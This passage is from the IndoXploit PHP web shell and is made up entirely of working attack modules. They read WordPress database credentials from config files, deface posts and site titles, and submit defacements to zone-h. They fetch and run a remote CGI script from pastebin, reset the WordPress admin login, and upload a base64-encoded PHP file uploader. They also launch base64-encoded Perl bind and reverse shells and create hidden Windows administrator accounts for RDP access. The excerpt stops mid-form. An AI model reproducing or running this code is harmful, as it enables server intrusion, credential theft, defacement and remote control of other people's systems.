1736. $title = htmlspecialchars($_POST['new_title']);
1737. $pn_title = str_replace(" ", "-", $title);
1738. if($_POST['cek_edit'] == "Y") {
1739. $script = $_POST['edit_content'];
1740. } else {
1741. $script = $title;
1742. }
1743. $conf = $_POST['config_dir'];
1744. $scan_conf = scandir($conf);
1745. foreach($scan_conf as $file_conf) {
1746. if(!is_file("$conf/$file_conf")) continue;
1747. $config = file_get_contents("$conf/$file_conf");
1748. if(preg_match("/WordPress/", $config)) {
1749. $dbhost = ambilkata($config,"DB_HOST', '","'");
1750. $dbuser = ambilkata($config,"DB_USER', '","'");
1751. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1752. $dbname = ambilkata($config,"DB_NAME', '","'");
1753. $dbprefix = ambilkata($config,"table_prefix = '","'");
1754. $prefix = $dbprefix."posts";
1755. $option = $dbprefix."options";
1756. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1757. $db = mysql_select_db($dbname);
1758. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1759. $result = mysql_fetch_array($q);
1760. $id = $result[ID];
1761. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1762. $result2 = mysql_fetch_array($q2);
1763. $target = $result2[option_value];
1764. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1765. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1766. echo "<div style='margin: 5px auto;'>";
1767. if($target == '') {
1768. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1769. } else {
1770. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1771. }
1772. if(!$update OR !$conn OR !$db) {
1773. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1774. } else {
1775. echo "<font color=#18BC9C>sukses di ganti.</font><br>";
1776. }
1777. echo "</div>";
1778. mysql_close($conn);
1779. }
1780. }
1781. } else {
1782. echo "<center>
1783. <h1>Auto Edit Title+Content WordPress</h1>
1784. <form method='post'>
1785. DIR Config: <br>
1786. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1787. Set Title: <br>
1788. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
1789. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1790. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1791. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1792. <input type='submit' class='btn btn-success btn-sm' name='hajar' value='Hajar!' style='width: 450px;'><br>
1793. </form>
1794. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1795. ";
1796. }
1797. } elseif($_GET['do'] == 'zoneh') {
1798. if($_POST['submit']) {
1799. $domain = explode("\r\n", $_POST['url']);
1800. $nick = $_POST['nick'];
1801. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1802. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1803. function zoneh($url,$nick) {
1804. $ch = curl_init("http://www.zone-h.com/notify/single");
1805. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1806. curl_setopt($ch, CURLOPT_POST, true);
1807. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1808. return curl_exec($ch);
1809. curl_close($ch);
1810. }
1811. foreach($domain as $url) {
1812. $zoneh = zoneh($url,$nick);
1813. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1814. echo "$url -> <font color=#18BC9C>OK</font><br>";
1815. } else {
1816. echo "$url -> <font color=red>ERROR</font><br>";
1817. }
1818. }
1819. } else {
1820. echo "<center><form method='post'>
1821. <u>Defacer</u>: <br>
1822. <input type='text' name='nick' size='50' value='IndoXploit'><br>
1823. <u>Domains</u>: <br>
1824. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1825. <input type='submit' class='btn btn-success btn-sm' name='submit' value='Submit' style='width: 450px;'>
1826. </form>";
1827. }
1828. echo "</center>";
1829. } elseif($_GET['do'] == 'cgi') {
1830. $cgi_dir = mkdir('idx_cgi', 0755);
1831. $file_cgi = "idx_cgi/cgi.izo";
1832. $isi_htcgi = "AddHandler cgi-script .izo";
1833. $htcgi = fopen(".htaccess", "w");
1834. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1835. $cgi = fopen($file_cgi, "w");
1836. fwrite($cgi, $cgi_script);
1837. fwrite($htcgi, $isi_htcgi);
1838. chmod($file_cgi, 0755);
1839. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1840. } elseif($_GET['do'] == 'fake_root') {
1841. ob_start();
1842. $cwd = getcwd();
1843. $ambil_user = explode("/", $cwd);
1844. $user = $ambil_user[2];
1845. if($_POST['reverse']) {
1846. $site = explode("\r\n", $_POST['url']);
1847. $file = $_POST['file'];
1848. foreach($site as $url) {
1849. $cek = getsource("$url/~$user/$file");
1850. if(preg_match("/hacked/i", $cek)) {
1851. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=#18BC9C>Fake Root!</font><br>";
1852. }
1853. }
1854. } else {
1855. echo "<center><form method='post'>
1856. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1857. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1858. Domain: <br>
1859. <textarea style='width: 450px; height: 250px;' name='url'>";
1860. reverse($_SERVER['HTTP_HOST']);
1861. echo "</textarea><br>
1862. <input type='submit' class='btn btn-success btn-sm' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1863. </form><br>
1864. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1865. }
1866. } elseif($_GET['do'] == 'adminer') {
1867. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1868. function adminer($url, $isi) {
1869. $fp = fopen($isi, "w");
1870. $ch = curl_init();
1871. curl_setopt($ch, CURLOPT_URL, $url);
1872. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1873. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1874. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1875. curl_setopt($ch, CURLOPT_FILE, $fp);
1876. return curl_exec($ch);
1877. curl_close($ch);
1878. fclose($fp);
1879. ob_flush();
1880. flush();
1881. }
1882. if(file_exists('adminer.php')) {
1883. echo "<center><font color=#18BC9C><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1884. } else {
1885. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1886. echo "<center><font color=#18BC9C><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1887. } else {
1888. echo "<center><font color=red>gagal buat file adminer</font></center>";
1889. }
1890. }
1891. } elseif($_GET['do'] == 'auto_dwp') {
1892. if($_POST['auto_deface_wp']) {
1893. function anucurl($sites) {
1894. $ch = curl_init($sites);
1895. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1896. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1897. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1898. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1899. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1900. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1901. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1902. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1903. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1904. $data = curl_exec($ch);
1905. curl_close($ch);
1906. return $data;
1907. }
1908. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1909. $post = array(
1910. "log" => "$userr",
1911. "pwd" => "$pass",
1912. "rememberme" => "forever",
1913. "wp-submit" => "$wp_submit",
1914. "redirect_to" => "$web",
1915. "testcookie" => "1",
1916. );
1917. $ch = curl_init($cek);
1918. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1919. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1920. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1921. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1922. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1923. curl_setopt($ch, CURLOPT_POST, 1);
1924. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1925. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1926. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1927. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1928. $data = curl_exec($ch);
1929. curl_close($ch);
1930. return $data;
1931. }
1932. $scan = $_POST['link_config'];
1933. $link_config = scandir($scan);
1934. $script = htmlspecialchars($_POST['script']);
1935. $user = "indoxploit";
1936. $pass = "indoxploit";
1937. $passx = md5($pass);
1938. foreach($link_config as $dir_config) {
1939. if(!is_file("$scan/$dir_config")) continue;
1940. $config = file_get_contents("$scan/$dir_config");
1941. if(preg_match("/WordPress/", $config)) {
1942. $dbhost = ambilkata($config,"DB_HOST', '","'");
1943. $dbuser = ambilkata($config,"DB_USER', '","'");
1944. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1945. $dbname = ambilkata($config,"DB_NAME', '","'");
1946. $dbprefix = ambilkata($config,"table_prefix = '","'");
1947. $prefix = $dbprefix."users";
1948. $option = $dbprefix."options";
1949. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1950. $db = mysql_select_db($dbname);
1951. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1952. $result = mysql_fetch_array($q);
1953. $id = $result[ID];
1954. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1955. $result2 = mysql_fetch_array($q2);
1956. $target = $result2[option_value];
1957. if($target == '') {
1958. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1959. } else {
1960. echo "[+] $target <br>";
1961. }
1962. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1963. if(!$conn OR !$db OR !$update) {
1964. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1965. mysql_close($conn);
1966. } else {
1967. $site = "$target/wp-login.php";
1968. $site2 = "$target/wp-admin/theme-install.php?upload";
1969. $b1 = anucurl($site2);
1970. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1971. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1972. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1973. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1974. $www = "m.php";
1975. $fp5 = fopen($www,"w");
1976. fputs($fp5,$upload3);
1977. $post2 = array(
1978. "_wpnonce" => "$anu2",
1979. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1980. "themezip" => "@$www",
1981. "install-theme-submit" => "Install Now",
1982. );
1983. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1984. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1985. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1986. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1987. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1988. curl_setopt($ch, CURLOPT_POST, 1);
1989. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1990. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1991. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1992. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1993. $data3 = curl_exec($ch);
1994. curl_close($ch);
1995. $y = date("Y");
1996. $m = date("m");
1997. $namafile = "id.php";
1998. $fpi = fopen($namafile,"w");
1999. fputs($fpi,$script);
2000. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2001. curl_setopt($ch6, CURLOPT_POST, true);
2002. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2003. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2004. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2005. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2006. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2007. $postResult = curl_exec($ch6);
2008. curl_close($ch6);
2009. $as = "$target/k.php";
2010. $bs = anucurl($as);
2011. if(preg_match("#$script#is", $bs)) {
2012. echo "[+] <font color='#18BC9C'>berhasil mepes...</font><br>";
2013. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2014. } else {
2015. echo "[-] <font color='red'>gagal mepes...</font><br>";
2016. echo "[!!] coba aja manual: <br>";
2017. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2018. echo "[+] username: <font color=#18BC9C>$user</font><br>";
2019. echo "[+] password: <font color=#18BC9C>$pass</font><br><br>";
2020. }
2021. mysql_close($conn);
2022. }
2023. }
2024. }
2025. } else {
2026. echo "<center><h1>WordPress Auto Deface</h1>
2027. <form method='post'>
2028. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2029. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
2030. <input type='submit' class='btn btn-success btn-sm' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2031. </form>
2032. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2033. </center>";
2034. }
2035. } elseif($_GET['do'] == 'auto_dwp2') {
2036. if($_POST['auto_deface_wp']) {
2037. function anucurl($sites) {
2038. $ch = curl_init($sites);
2039. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2040. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2041. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2042. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2043. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2044. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2045. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2046. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2047. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2048. $data = curl_exec($ch);
2049. curl_close($ch);
2050. return $data;
2051. }
2052. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2053. $post = array(
2054. "log" => "$userr",
2055. "pwd" => "$pass",
2056. "rememberme" => "forever",
2057. "wp-submit" => "$wp_submit",
2058. "redirect_to" => "$web",
2059. "testcookie" => "1",
2060. );
2061. $ch = curl_init($cek);
2062. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2063. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2064. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2065. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2066. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2067. curl_setopt($ch, CURLOPT_POST, 1);
2068. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2069. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2070. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2071. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2072. $data = curl_exec($ch);
2073. curl_close($ch);
2074. return $data;
2075. }
2076. $link = explode("\r\n", $_POST['link']);
2077. $script = htmlspecialchars($_POST['script']);
2078. $user = "indoxploit";
2079. $pass = "indoxploit";
2080. $passx = md5($pass);
2081. foreach($link as $dir_config) {
2082. $config = anucurl($dir_config);
2083. $dbhost = ambilkata($config,"DB_HOST', '","'");
2084. $dbuser = ambilkata($config,"DB_USER', '","'");
2085. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2086. $dbname = ambilkata($config,"DB_NAME', '","'");
2087. $dbprefix = ambilkata($config,"table_prefix = '","'");
2088. $prefix = $dbprefix."users";
2089. $option = $dbprefix."options";
2090. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2091. $db = mysql_select_db($dbname);
2092. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2093. $result = mysql_fetch_array($q);
2094. $id = $result[ID];
2095. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2096. $result2 = mysql_fetch_array($q2);
2097. $target = $result2[option_value];
2098. if($target == '') {
2099. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2100. } else {
2101. echo "[+] $target <br>";
2102. }
2103. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2104. if(!$conn OR !$db OR !$update) {
2105. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2106. mysql_close($conn);
2107. } else {
2108. $site = "$target/wp-login.php";
2109. $site2 = "$target/wp-admin/theme-install.php?upload";
2110. $b1 = anucurl($site2);
2111. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2112. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2113. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2114. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2115. $www = "m.php";
2116. $fp5 = fopen($www,"w");
2117. fputs($fp5,$upload3);
2118. $post2 = array(
2119. "_wpnonce" => "$anu2",
2120. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2121. "themezip" => "@$www",
2122. "install-theme-submit" => "Install Now",
2123. );
2124. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2125. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2126. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2127. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2128. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2129. curl_setopt($ch, CURLOPT_POST, 1);
2130. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2131. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2132. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2133. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2134. $data3 = curl_exec($ch);
2135. curl_close($ch);
2136. $y = date("Y");
2137. $m = date("m");
2138. $namafile = "id.php";
2139. $fpi = fopen($namafile,"w");
2140. fputs($fpi,$script);
2141. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2142. curl_setopt($ch6, CURLOPT_POST, true);
2143. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2144. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2145. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2146. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2147. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2148. $postResult = curl_exec($ch6);
2149. curl_close($ch6);
2150. $as = "$target/k.php";
2151. $bs = anucurl($as);
2152. if(preg_match("#$script#is", $bs)) {
2153. echo "[+] <font color='#18BC9C'>berhasil mepes...</font><br>";
2154. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2155. } else {
2156. echo "[-] <font color='red'>gagal mepes...</font><br>";
2157. echo "[!!] coba aja manual: <br>";
2158. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2159. echo "[+] username: <font color=#18BC9C>$user</font><br>";
2160. echo "[+] password: <font color=#18BC9C>$pass</font><br><br>";
2161. }
2162. mysql_close($conn);
2163. }
2164. }
2165. } else {
2166. echo "<center><h1>WordPress Auto Deface V.2</h1>
2167. <form method='post'>
2168. Link Config: <br>
2169. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2170. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
2171. <input type='submit' class='btn btn-success btn-sm' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2172. </form></center>";
2173. }
2174. } elseif($_GET['do'] == 'network') {
2175. echo "<form method='post'>
2176. <u>Bind Port:</u> <br>
2177. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2178. <input type='submit' class='btn btn-success btn-sm' name='sub_bp' value='>>'>
2179. </form>
2180. <form method='post'>
2181. <u>Back Connect:</u> <br>
2182. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2183. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2184. <input type='submit' class='btn btn-success btn-sm' name='sub_bc' value='>>'>
2185. </form>";
2186. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2187. if(isset($_POST['sub_bp'])) {
2188. $f_bp = fopen("/tmp/bp.pl", "w");
2189. fwrite($f_bp, base64_decode($bind_port_p));
2190. fclose($f_bp);
2191.  
2192. $port = $_POST['port_bind'];
2193. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2194. sleep(1);
2195. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2196. unlink("/tmp/bp.pl");
2197. }
2198. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2199. if(isset($_POST['sub_bc'])) {
2200. $f_bc = fopen("/tmp/bc.pl", "w");
2201. fwrite($f_bc, base64_decode($bind_connect_p));
2202. fclose($f_bc);
2203.  
2204. $ipbc = $_POST['ip_bc'];
2205. $port = $_POST['port_bc'];
2206. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2207. sleep(1);
2208. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2209. unlink("/tmp/bc.pl");
2210. }
2211. } elseif($_GET['do'] == 'krdp_shell') {
2212. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2213. if($_POST['create']) {
2214. $user = htmlspecialchars($_POST['user']);
2215. $pass = htmlspecialchars($_POST['pass']);
2216. if(preg_match("/$user/", exe("net user"))) {
2217. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> sudah ada</font>";
2218. } else {
2219. $add_user = exe("net user $user $pass /add");
2220. $add_groups1 = exe("net localgroup Administrators $user /add");
2221. $add_groups2 = exe("net localgroup Administrator $user /add");
2222. $add_groups3 = exe("net localgroup Administrateur $user /add");
2223. echo "[ RDP ACCOUNT INFO<br>
2224. ------------------------------<br>
2225. IP: <font color=#18BC9C>".$ip."</font><br>
2226. Username: <font color=#18BC9C>$user</font><br>
2227. Password: <font color=#18BC9C>$pass</font><br>
2228. ------------------------------<br><br>
2229. [ STATUS<br>
2230. ------------------------------<br>
2231. ";
2232. if($add_user) {
2233. echo "[add user] -> <font color='#18BC9C'>Berhasil</font><br>";
2234. } else {
2235. echo "[add user] -> <font color='red'>Gagal</font><br>";
2236. }
2237. if($add_groups1) {
2238. echo "[add localgroup Administrators] -> <font color='#18BC9C'>Berhasil</font><br>";
2239. } elseif($add_groups2) {
2240. echo "[add localgroup Administrator] -> <font color='#18BC9C'>Berhasil</font><br>";
2241. } elseif($add_groups3) {
2242. echo "[add localgroup Administrateur] -> <font color='#18BC9C'>Berhasil</font><br>";
2243. } else {
2244. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2245. }
2246. echo "------------------------------<br>";
2247. }
2248. } elseif($_POST['s_opsi']) {
2249. $user = htmlspecialchars($_POST['r_user']);
2250. if($_POST['opsi'] == '1') {
2251. $cek = exe("net user $user");
2252. echo "Checking username <font color=#18BC9C>$user</font> ....... ";
2253. if(preg_match("/$user/", $cek)) {
2254. echo "[ <font color=#18BC9C>Sudah ada</font><br>
2255. ------------------------------<br><br>
2256. <pre>$cek</pre>";
2257. } else {
2258. echo "[ <font color=red>belum ada</font>";
2259. }
2260. } elseif($_POST['opsi'] == '2') {
2261. $cek = exe("net user $user indoxploit");
2262. if(preg_match("/$user/", exe("net user"))) {
2263. echo "[change password: <font color=#18BC9C>indoxploit</font>] -> ";
2264. if($cek) {
2265. echo "<font color=#18BC9C>Berhasil</font>";
2266. } else {
2267. echo "<font color=red>Gagal</font>";
2268. }
2269. } else {
2270. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> belum ada</font>";
2271. }
2272. } elseif($_POST['opsi'] == '3') {
2273. $cek = exe("net user $user /DELETE");
2274. if(preg_match("/$user/", exe("net user"))) {
2275. echo "[remove user: <font color=#18BC9C>$user</font>] -> ";
2276. if($cek) {
2277. echo "<font color=#18BC9C>Berhasil</font>";
2278. } else {
2279. echo "<font color=red>Gagal</font>";
2280. }
2281. } else {
2282. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> belum ada</font>";
2283. }
2284. } else {
2285. //
2286. }
2287. } else {
2288. echo "-- Create RDP --<br>
2289. <form method='post'>
